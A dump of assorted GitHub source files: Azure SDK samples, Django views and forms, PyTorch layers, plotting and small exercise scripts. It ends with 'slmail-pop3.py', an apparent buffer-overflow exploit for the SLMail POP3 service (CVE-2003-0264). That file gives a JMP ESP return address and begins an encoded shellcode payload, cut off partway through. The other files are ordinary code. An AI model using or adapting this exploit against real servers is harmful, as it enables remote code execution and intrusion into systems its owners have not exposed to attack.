tymchenko99978@gmail.com
|
3144ecf342e1c38eb5c4bcf21135c183e9157eee
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/datashare/azure-mgmt-datashare/generated_samples/provider_share_subscriptions_adjust.py
|
496c049f7baa29e25e02b0ee6f7ed8ffa89deaa0
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,824
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datashare import DataShareManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datashare
# USAGE
python provider_share_subscriptions_adjust.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = DataShareManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-12345678abc",
)
response = client.provider_share_subscriptions.adjust(
resource_group_name="SampleResourceGroup",
account_name="Account1",
share_name="Share1",
provider_share_subscription_id="4256e2cf-0f82-4865-961b-12f83333f487",
provider_share_subscription={"properties": {"expirationDate": "2020-12-26T22:33:24.5785265Z"}},
)
print(response)
# x-ms-original-file: specification/datashare/resource-manager/Microsoft.DataShare/stable/2020-09-01/examples/ProviderShareSubscriptions_Adjust.json
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
f2364a1f5e0049d916164fd82672d551cdfff20d
|
436568fbadd6f52fb5388136a67eef75d86bc6a7
|
/Python3_Mundo2_Introdução ao Mundo 2/Python3_Mundo2_Aula15_Interrompendo repetições while/Desafio068.py
|
f36c743d48b38c87c1b3a887d28b18324ddafa96
|
[
"MIT"
] |
permissive
|
AgladeJesus/python
|
3c72cddaf4e3c92464b5cee7975bd56a764b5f5c
|
16e4e5cc43aa987858a4719748708d6d5327d75d
|
refs/heads/master
| 2023-08-31T08:34:17.069874
| 2021-09-08T08:45:05
| 2021-09-08T08:45:05
| 377,415,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
from random import randint
print('Olá, caro jogador, sou o computador, e quero dispultar com você no Impar/Par.')
v = 0
while True:
jogador = int(input('Digita um número de 1 a 10: '))
cp = randint(0, 10)
total = jogador + cp
tipo = ' '
while tipo not in 'PI':
tipo = str(input('Par ou ìmpar: [P/I]: ')).strip().upper()[0]
print(f'Você jogou {jogador} e o computador {cp}, o total é {total}', end=' ')
print('DEU PAR' if total % 2 == 0 else 'DEU ÍMPAR')
if tipo == 'P':
if total % 2 == 0:
print('Você VENCEU!!')
v += 1
else:
print('Você PERDEU!!')
break
elif tipo == 'I':
if total % 2 == 1:
print('Você VENCEU!!')
v += 1
else:
print('Você PERDEU!!')
break
if v > 0:
print(f'Você tem {v} votórias')
else:
print(' ')
print('Vamos jogar novamente...')
|
[
"agladejesus@gmail.com"
] |
agladejesus@gmail.com
|
21b5c899a32d5a276c1913f41db7bb2bdd4114a1
|
f4b2f6f8c82ba00a79712292cae159edd6e93316
|
/python_voc_parser/__init__.py
|
e8b5a4dd78a5f1211bf1167cf90337dde6e4acf9
|
[
"MIT"
] |
permissive
|
gabrielrezzonico/python_voc_parser
|
31e5d016cce8a77e3cbd302f34f677ba1ca934c1
|
dd645402e40d3e18a33375f0fe92201013343110
|
refs/heads/master
| 2021-01-19T11:17:56.598529
| 2017-04-12T19:10:53
| 2017-04-12T19:10:53
| 87,950,887
| 7
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
"""Utilities"""
from . import helpers
from . import voc_annotations_parser
# Globally-importable utils.
from .voc_annotations_parser import VocAnnotationsParser
|
[
"gabrielrezzonico@gmail.com"
] |
gabrielrezzonico@gmail.com
|
4a1dff1fff68c27fb3452129c56f54a62957e1cf
|
716c453110217e4b478823940b6ce773fe837b3b
|
/BlogProject/school_project/users/forms.py
|
a8b4b32dc1500efcd07e0eadc0894aef874ace31
|
[] |
no_license
|
Mateaus/blog_site
|
e9a46ac581a65c2b563ff18090480f775a5ad9cf
|
305bafbd18c2a260589da77d8e162fb36994357b
|
refs/heads/master
| 2020-05-07T11:59:47.008936
| 2019-04-11T17:42:58
| 2019-04-11T17:42:58
| 180,485,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile
# changing form to include email field
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email']
class ProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['image']
|
[
"noreply@github.com"
] |
Mateaus.noreply@github.com
|
8b8c7653fa04c56d1f7f07d4dfa5f5737209c3b7
|
c9a34a7036865101d05065fe47e86c8b173d0b93
|
/test.py
|
fbe90e2d911fe9a2612c4329bca87b6036e73644
|
[] |
no_license
|
Pablocg0/Proyecto_ia
|
7f4e810a5b3cffe586609527d4f2c1367c0ee096
|
5f8ffa56f5e4c7b8adbe098b81599fa7fddbb7ae
|
refs/heads/master
| 2020-09-06T18:10:44.894310
| 2019-11-09T05:54:18
| 2019-11-09T05:54:18
| 220,504,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
import pandas as pd
diccionario = pd.read_csv("dick_1.csv")
palabra = diccionario["a"].sample(n=10)
palabra.to_csv("dick.csv",encoding='utf-8',index=False)
|
[
"pablocg064@gmail.com"
] |
pablocg064@gmail.com
|
29b750bb302001c9849c94b7e2eeb31a1216aadf
|
25a4df7d63285564159a2c9d5b48a66e767c09f9
|
/test_triangle.py
|
1ce21821c7abd08bbac558ff344f2410fb0a0767
|
[
"MIT"
] |
permissive
|
philetus/superNormal
|
c82677c81359e92f33810660fa5aa45161004a71
|
b6df64c2ef4838b8a2080fae0be57cfee40ccf7a
|
refs/heads/master
| 2020-03-20T06:07:10.998229
| 2018-06-13T16:27:41
| 2018-06-13T16:42:02
| 137,239,304
| 0
| 0
| null | 2018-06-13T16:05:38
| 2018-06-13T16:05:38
| null |
UTF-8
|
Python
| false
| false
| 1,406
|
py
|
import glfw
import OpenGL.GL as gl
def main():
# Initialize the library
if not glfw.init():
return
# Create a windowed mode window and its OpenGL context
window = glfw.create_window(640, 480, "Hello World", None, None)
if not window:
glfw.terminate()
return
# Make the window's context current
glfw.make_context_current(window)
# Loop until the user closes the window
while not glfw.window_should_close(window):
# Render here, e.g. using pyOpenGL
width, height = glfw.get_framebuffer_size(window)
ratio = width / float(height)
gl.glViewport(0, 0, width, height)
gl.glClear(gl.GL_COLOR_BUFFER_BIT)
gl.glMatrixMode(gl.GL_PROJECTION)
gl.glLoadIdentity()
gl.glOrtho(-ratio, ratio, -1, 1, 1, -1)
gl.glMatrixMode(gl.GL_MODELVIEW)
gl.glLoadIdentity()
# gl.glRotatef(glfw.glfwGetTime() * 50, 0, 0, 1)
gl.glBegin(gl.GL_TRIANGLES)
gl.glColor3f(1, 0, 0)
gl.glVertex3f(-0.6, -0.4, 0)
gl.glColor3f(0, 1, 0)
gl.glVertex3f(0.6, -0.4, 0)
gl.glColor3f(0, 0, 1)
gl.glVertex3f(0, 0.6, 0)
gl.glEnd()
# Swap front and back buffers
glfw.swap_buffers(window)
# Poll for and process events
glfw.poll_events()
glfw.terminate()
if __name__ == "__main__":
main()
|
[
"cheeriocheng@gmail.com"
] |
cheeriocheng@gmail.com
|
f9911ba1ef369f850f1fe229f1de64f2c3a20c93
|
d49fd2040235f30e5701a997b2afcc4b123b82f1
|
/neighbourhood/views.py
|
513fb809d73e570ef76ba59f7bf262d4e1235690
|
[
"MIT"
] |
permissive
|
ClintonClin/neighbourhood
|
830b9bd0b7e27308b54fedb432877191e6a3585e
|
509ba9702d67e5636aee9d754eaa41e57a52b61a
|
refs/heads/master
| 2022-12-11T08:23:08.690787
| 2019-02-28T10:57:05
| 2019-02-28T10:57:05
| 165,234,843
| 0
| 0
| null | 2022-12-08T03:00:45
| 2019-01-11T11:43:06
|
Python
|
UTF-8
|
Python
| false
| false
| 7,746
|
py
|
from django.shortcuts import render, redirect
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ObjectDoesNotExist
from .models import neighbourhood, healthservices, Business, Health, Authorities, BlogPost, Profile, Notifications, Comment
from .email import send_priority_email
from .forms import notificationsForm, ProfileForm, BlogPostForm, BusinessForm, CommentForm
from decouple import config, Csv
import datetime as dt
from django.http import JsonResponse
import json
from django.db.models import Q
from django.contrib.auth.models import User
from rest_framework.response import Response
from rest_framework.views import APIView
# Create your views here.
def index(request):
try:
if not request.user.is_authenticated:
return redirect('/accounts/login/')
current_user = request.user
profile = Profile.objects.get(username=current_user)
except ObjectDoesNotExist:
return redirect('create-profile')
return render(request, 'index.html')
@login_required(login_url='/accounts/login/')
def notification(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
all_notifications = Notifications.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'notifications.html', {"notifications": all_notifications})
@login_required(login_url='/accounts/login/')
def health(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
healthservices = Health.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'health.html', {"healthservices": healthservices})
@login_required(login_url='/accounts/login/')
def blog(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
blogposts = BlogPost.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'blog.html', {"blogposts": blogposts})
@login_required(login_url='/accounts/login/')
def businesses(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
businesses = Business.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'business.html', {"businesses": businesses})
@login_required(login_url='/accounts/login/')
def authorities(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
authorities = Authorities.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'security.html', {"authorities": authorities})
@login_required(login_url='/accounts/login/')
def view_blog(request, id):
current_user = request.user
try:
comments = Comment.objects.filter(post_id=id)
except:
comments = []
blog = BlogPost.objects.get(id=id)
if request.method == 'POST':
form = CommentForm(request.POST, request.FILES)
if form.is_valid():
comment = form.save(commit=False)
comment.username = current_user
comment.post = blog
comment.save()
else:
form = CommentForm()
return render(request, 'view_blog.html', {"blog": blog, "form": form, "comments": comments})
@login_required(login_url='/accounts/login/')
def user_profile(request, username):
user = User.objects.get(username=username)
profile = Profile.objects.get(username=user)
return render(request, 'profile.html', {"profile": profile})
@login_required(login_url='/accounts/login/')
def my_profile(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
return render(request, 'user_profile.html', {"profile": profile})
@login_required(login_url='/accounts/login/')
def new_blogpost(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
if request.method == "POST":
form = BlogPostForm(request.POST, request.FILES)
if form.is_valid():
blogpost = form.save(commit=False)
blogpost.username = current_user
blogpost.neighbourhood = profile.neighbourhood
blogpost.avatar = profile.avatar
blogpost.save()
return HttpResponseRedirect('/blog')
else:
form = BlogPostForm()
return render(request, 'blogpost_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def new_business(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
if request.method == "POST":
form = BusinessForm(request.POST, request.FILES)
if form.is_valid():
business = form.save(commit=False)
business.owner = current_user
business.neighbourhood = profile.neighbourhood
business.save()
return HttpResponseRedirect('/business')
else:
form = BusinessForm()
return render(request, 'business_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def create_profile(request):
current_user = request.user
if request.method == "POST":
form = ProfileForm(request.POST, request.FILES)
if form.is_valid():
profile = form.save(commit=False)
profile.username = current_user
profile.save()
return HttpResponseRedirect('/')
else:
form = ProfileForm()
return render(request, 'profile_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def new_notification(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
if request.method == "POST":
form = notificationsForm(request.POST, request.FILES)
if form.is_valid():
notification = form.save(commit=False)
notification.author = current_user
notification.neighbourhood = profile.neighbourhood
notification.save()
# if notification.priority == 'High Priority':
# send_priority_email(profile.name, profile.email, notification.title, notification.notification, notification.author, notification.neighbourhood)
return HttpResponseRedirect('/notifications')
else:
form = notificationsForm()
return render(request, 'notifications_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def update_profile(request):
current_user = request.user
if request.method == "POST":
instance = Profile.objects.get(username=current_user)
form = ProfileForm(request.POST, request.FILES, instance=instance)
if form.is_valid():
profile = form.save(commit=False)
profile.username = current_user
profile.save()
return redirect('Index')
elif Profile.objects.get(username=current_user):
profile = Profile.objects.get(username=current_user)
form = ProfileForm(instance=profile)
else:
form = ProfileForm()
return render(request, 'update_profile.html', {"form": form})
@login_required(login_url='/accounts/login/')
def search_results(request):
if 'blog' in request.GET and request.GET["blog"]:
search_term = request.GET.get("blog")
searched_blogposts = BlogPost.search_blogpost(search_term)
message = f"{search_term}"
print(searched_blogposts)
return render(request, 'search.html', {"message": message, "blogs": searched_blogposts})
else:
message = "You haven't searched for anything"
return render(request, 'search.html', {"message": message})
|
[
"clintonclin00@gmail.com"
] |
clintonclin00@gmail.com
|
6b585b2fcc4e1b39e9ed6dbd006f975bf82030b4
|
0fe88e2bcf3015f6b54508b2304e9833bc7f7eb2
|
/skadi/index/__init__.py
|
df5fab35467894641108704a015acd8e8ae77318
|
[
"MIT"
] |
permissive
|
gwvent/skadi
|
3d73ba6efbc32065599d2e0773f4783342cf5482
|
0b5c983a0a17e57d70fb64b2401caba40d43679a
|
refs/heads/master
| 2021-01-17T22:54:38.196692
| 2013-08-20T08:04:25
| 2013-08-20T08:04:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,355
|
py
|
import math
VI_BIT_MAX = 35
VI_SHIFT = 7
VI_MAX_BYTES = int(math.ceil(float(VI_BIT_MAX) / VI_SHIFT))
VI_MASK = (1 << 32) - 1
class InvalidVarint(Exception):
pass
# Algorithm "borrowed" from Google protobuf library.
def peek_varint(stream):
peeked = stream.peek(VI_MAX_BYTES)
size, value, shift = 0, 0, 0
while True:
if size >= len(peeked):
raise EOFError()
byte = ord(peeked[size])
size += 1
value |= ((byte & 0x7f) << shift)
shift += VI_SHIFT
if not (byte & 0x80):
value &= VI_MASK
return value, size
if shift >= VI_BIT_MAX:
raise InvalidVarint
def read_varint(stream):
value, size = peek_varint(stream)
stream.read(size)
return value
class InvalidProtobufMessage(Exception):
pass
class Index(object):
def __init__(self, iterable):
self.peeks = list(iterable)
def __iter__(self):
return iter(self.peeks)
def find(self, cls):
return next(iter(filter(lambda p: p.cls == cls, self.peeks)), None)
def find_all(self, cls):
return filter(lambda p: p.cls == cls, self.peeks)
def find_behind(self, offset):
return filter(lambda p: p.offset < offset, self.peeks)
def find_at(self, offset):
return filter(lambda p: p.offset == offset, self.peeks)
def find_ahead(self, offset):
return filter(lambda p: p.offset > offset, self.peeks)
|
[
"joshua.a.morris@gmail.com"
] |
joshua.a.morris@gmail.com
|
574e6816db82fec92e4c415548263fb7ef3a52d2
|
ab149b8f1f20bf2212bead49fdf5bd6bf5330b89
|
/model/encoder.py
|
f5b18c46738890812e0f004126797488274a0a76
|
[
"MIT"
] |
permissive
|
wheeltune/kid-neuro
|
69ecf08717d82660cf0e6eccd406c0cad9f24f1e
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
refs/heads/main
| 2023-06-04T06:07:45.074418
| 2021-06-21T23:54:27
| 2021-06-21T23:54:27
| 375,545,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,559
|
py
|
import torch.nn as nn
from .norm_layer import NormLayer
__all__ = ["KeystrokesEncoder"]
#===============================================================================
class KeystrokesEncoder(nn.Module):
#---------------------------------------------------------------------------
def __init__(self, d_codes, d_hidden, n_layers, p_rnn_dropout=0.2, dropout=0.5):
super().__init__()
self.d_codes = d_codes
self.d_times = 4
self.d_model = self.d_codes + self.d_times
self.d_hidden = d_hidden
self.p_dropout = dropout
self.p_rnn_dropout = p_rnn_dropout
self.batch_norm_1 = NormLayer(self.d_model)
self.rnn_1 = nn.LSTM(
self.d_model,
self.d_hidden,
num_layers=n_layers,
dropout=self.p_rnn_dropout,
batch_first=True
)
self.batch_norm_2 = NormLayer(self.d_hidden)
self.dropout = nn.Dropout(self.p_dropout)
self.rnn_2 = nn.LSTM(
self.d_hidden,
self.d_hidden,
num_layers=n_layers,
dropout=self.p_rnn_dropout,
batch_first=True,
)
#---------------------------------------------------------------------------
def forward(self, x):
x = self.batch_norm_1(x)
x, _ = self.rnn_1(x)
x = self.batch_norm_2(x)
x = self.dropout(x)
_, (ht, _) = self.rnn_2(x)
x = ht[-1]
return x
#===============================================================================
|
[
"wheeltune@gmail.com"
] |
wheeltune@gmail.com
|
cd6ab3e5c6e2b23fd99f849a3780802dacbeb28a
|
e9c119c3da03b4347456091cc439aaedb07a4bdf
|
/python work week 9 question 2.py
|
576f46d5c72e8ca358a6752ef261406819195dd4
|
[] |
no_license
|
infinityman8/week9-12-logbook
|
da8b1e5942f36b006f3e6bfc0b713623d862f247
|
4de033f3fcb0b69984a1ba0f4a0a654c386c4ec1
|
refs/heads/master
| 2020-04-07T13:52:27.005786
| 2018-12-04T17:44:12
| 2018-12-04T17:44:12
| 158,425,236
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
def main():
a=5
b=7
print(mystery(a,b))
def mystery(x,y):
z=x + y
z= z / 2.0
return z
main()
|
[
"noreply@github.com"
] |
infinityman8.noreply@github.com
|
13319f9028ad09f1d990efba329a3d5162550bb6
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/image_classification/CSPResNeXt-50_ID1888_for_PyTorch/timm/models/layers/separable_conv.py
|
340f58362031b648a0361ac28d85bde369834876
|
[
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MIT",
"CC-BY-NC-4.0",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 4,530
|
py
|
#
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
""" Depthwise Separable Conv Modules
Basic DWS convs. Other variations of DWS exist with batch norm or activations between the
DW and PW convs such as the Depthwise modules in MobileNetV2 / EfficientNet and Xception.
Hacked together by / Copyright 2020 Ross Wightman
"""
from torch import nn as nn
from .create_conv2d import create_conv2d
from .create_norm_act import convert_norm_act
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
class SeparableConvBnAct(nn.Module):
""" Separable Conv w/ trailing Norm and Activation
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU,
apply_act=True, drop_block=None):
super(SeparableConvBnAct, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
norm_act_layer = convert_norm_act(norm_layer, act_layer)
self.bn = norm_act_layer(out_channels, apply_act=apply_act, drop_block=drop_block)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
if self.bn is not None:
x = self.bn(x)
return x
class SeparableConv2d(nn.Module):
""" Separable Conv
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1):
super(SeparableConv2d, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
return x
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
ce08b5951af442d5ac48612351d428e06a55e1e3
|
2ef93f98aef88475441e112223d127b583bc96ec
|
/tesla_ohlc.py
|
91125a3b6ff6b4d4e6ad12ce6a156a620543b75f
|
[] |
no_license
|
bluesealin/Machine-Learning
|
ba6d54ef82879f0cf5f3ef58a7bb9941d15e0e94
|
cc637c8901c384e70b7b1decac66ec4d245075c5
|
refs/heads/master
| 2021-05-03T07:42:55.966116
| 2018-01-17T17:41:05
| 2018-01-17T17:41:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,573
|
py
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
from matplotlib.finance import candlestick_ohlc
import matplotlib.dates as mdates
import pandas as pd
import pandas_datareader.data as web
style.use('ggplot')
# creating the csv file
#start = dt.datetime(2000, 1, 1)
#end = dt.datetime(2016, 12, 31)
#df = web.DataReader('TSLA', 'yahoo', start, end)
#df.to_csv('tsla.csv')
# column 0 (dates) will be the index column
df = pd.read_csv('tsla.csv', parse_dates=True, index_col=0)
# moving average will take the last 100 day prices and take the average of them today, min_periods will avoid NaN
# df['100ma'] = df['Adj Close'].rolling(window=100, min_periods=0).mean()
# resample
# OpenHighLowClose ex: 10Min, 6Min
df_ohlc = df['Adj Close'].resample('10D').ohlc()
df_volume = df['Volume'].resample('10D').sum()
# data based on 10 days
#print(df_ohlc.head())
# reset index and convert dates to mdates number so we can get the values
df_ohlc.reset_index(inplace=True)
df_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num)
# ploting w/ matplotlib and taking the values w/ pandas
# rows x columns gridsize staring
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
# this will display beatiful dates
ax1.xaxis_date()
candlestick_ohlc(ax1, df_ohlc.values, width=2, colorup='g')
# x = df_volume.index.map(mdates.date2num), y = df_volume.values, fill from 0 to y
ax2.fill_between(df_volume.index.map(mdates.date2num), df_volume.values, 0)
plt.show()
|
[
"lucasdraichi@gmail.com"
] |
lucasdraichi@gmail.com
|
94661a6524510a11b67815c32e25b75865809f16
|
ff8f1bb7be35166965ca624681f5a522b60de306
|
/medical/migrations/0011_hivemedicalrecords_user.py
|
d96926b9bc913bd8a627d1877f0c5b6cac1215d9
|
[] |
no_license
|
jonathanw82/thehoneycombAM
|
8f6b2e43d7c429b8dd1c4655e7212d4a5c9f7303
|
5a20efd9dcc6f81d1773c01c218a92732a815903
|
refs/heads/master
| 2023-04-10T06:33:48.462700
| 2021-04-12T11:40:56
| 2021-04-12T11:40:56
| 294,968,786
| 1
| 1
| null | 2021-02-16T14:25:58
| 2020-09-12T15:16:27
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 521
|
py
|
# Generated by Django 3.1.3 on 2021-01-21 16:51
import django.contrib.auth.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('medical', '0010_auto_20210112_1633'),
]
operations = [
migrations.AddField(
model_name='hivemedicalrecords',
name='user',
field=models.CharField(default=1, max_length=50, verbose_name=django.contrib.auth.models.User),
preserve_default=False,
),
]
|
[
"jonwhewaycode@outlook.com"
] |
jonwhewaycode@outlook.com
|
3459276818ce07479d8a250a648e51b33e116764
|
c9ca065c2674ca30c12a90ceab88ac5798646473
|
/weather/weather.py
|
0911597edd9300a64cc9034898c72555e919512b
|
[] |
no_license
|
mshazman/data_munging
|
beaa389ad3de48d52f1f2ef03ed4ba7f04c77698
|
f4f815a896f8f7a6957ebbb22369dd760e95072e
|
refs/heads/master
| 2020-07-23T17:03:01.970331
| 2019-09-10T19:07:20
| 2019-09-10T19:07:20
| 207,640,211
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
"""This Module have class to perform all calculation realted to weather"""
import calculation
class WeatherCalculation(calculation.Computation):
"""class object takes data in form of dictionary and apply functions on it"""
def __init__(self, weather_data):
self.weather_data = weather_data
def min_spread_day(self):
"""Function Return day on with temp diffrence is minimum"""
min_value = self.compute_min_value(self.weather_data)
min_value_key = self.compute_min_value_key(min_value, self.weather_data)
return min_value, min_value_key
|
[
"="
] |
=
|
dbce7481439b0de5401a7b81de4c4d300404aa6b
|
6388104b646b304a081985216ad2f82f09db2af3
|
/slmail-pop3.py
|
67f374a5ffac594a45f6cfba7a7c22230d03e945
|
[] |
no_license
|
war4uthor/CVE-2003-0264
|
73bd207d3f989434be942982d344285633f6fc48
|
82352386a3e740db37f84ebbaed2632965c4c0a8
|
refs/heads/master
| 2020-04-12T12:41:00.763220
| 2018-12-19T22:50:30
| 2018-12-19T22:50:30
| 162,499,093
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,955
|
py
|
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 5F4A358F FFE4 JMP ESP
shellcode = (
"\xb8\x9a\x26\x16\x98\xd9\xcd\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x0e\x03\xd8\x28\xf4\x6d\x20\xdc\x7a"
"\x8d\xd8\x1d\x1b\x07\x3d\x2c\x1b\x73\x36\x1f\xab\xf7\x1a\xac"
"\x40\x55\x8e\x27\x24\x72\xa1\x80\x83\xa4\x8c\x11\xbf\x95\x8f"
"\x91\xc2\xc9\x6f\xab\x0c\x1c\x6e\xec\x71\xed\x22\xa5\xfe\x40"
"\xd2\xc2\x4b\x59\x59\x98\x5a\xd9\xbe\x69\x5c\xc8\x11\xe1\x07"
"\xca\x90\x26\x3c\x43\x8a\x2b\x79\x1d\x21\x9f\xf5\x9c\xe3\xd1"
"\xf6\x33\xca\xdd\x04\x4d\x0b\xd9\xf6\x38\x65\x19\x8a\x3a\xb2"
"\x63\x50\xce\x20\xc3\x13\x68\x8c\xf5\xf0\xef\x47\xf9\xbd\x64"
"\x0f\x1e\x43\xa8\x24\x1a\xc8\x4f\xea\xaa\x8a\x6b\x2e\xf6\x49"
"\x15\x77\x52\x3f\x2a\x67\x3d\xe0\x8e\xec\xd0\xf5\xa2\xaf\xbc"
